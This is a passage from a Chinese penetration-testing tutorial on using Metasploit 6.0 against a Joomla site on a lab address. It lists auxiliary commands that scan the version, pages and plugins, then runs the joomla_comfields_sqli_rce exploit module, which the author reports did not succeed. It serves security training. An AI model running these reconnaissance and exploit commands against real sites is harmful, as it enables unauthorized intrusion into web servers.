Metasploit6.0系列教程 -- 渗透Joomla网站

Posted web安全工具库

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Metasploit6.0系列教程 -- 渗透Joomla网站相关的知识,希望对你有一定的参考价值。

一、使用Metasploit对Joomal进行侦察

1、探测版本信息

选择joomla_version辅助模块,设置端口号及IP地址,run运行

use auxiliary/scanner/http/joomla_versionset rhosts 192.168.1.111set rport 8080run

2、页面枚举

选择Joomla_pages辅助模块,设置端口号及IP地址,run运行

use auxiliary/scanner/http/joomla_pagesset rhosts 192.168.1.111set rport 8080run

3、插件枚举

选择Joomla_plugins辅助模块,设置端口号及IP地址,run运行

use auxiliary/scanner/http/joomla_pluginsset rhosts 192.168.1.111set rport 8080run

二、使用Metasploit对Joomla进行漏洞利用

1、use unix/webapp/joomla_comfields_sqli_rce2、set rhosts 192.168.1.1113、set rport 80804、run

5、因为利用模块会报错,所以需要修改一下,但是最后还是没有利用成功,获取cookie的时候可能出问题了,大家有兴趣的可以继续修改一下。

该系列教程内容参考自华章IT出版的

《Web渗透测试实战:基于Metasploit 5.0》

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

以上是关于Metasploit6.0系列教程 -- 渗透Joomla网站的主要内容,如果未能解决你的问题,请参考以下文章

Metasploit6.0系列教程 -- MSF控制台命令

Metasploit6.0系列教程 -- MSF控制台命令

纯干货-内网渗透系列教程——NTLM 与 NTLM 身份认证

内网渗透工具CobaltStrike使用教程详解

Cobaltstrike系列教程-Listner与Payload生成 heatlevel

内网渗透系列:横向渗透方法小结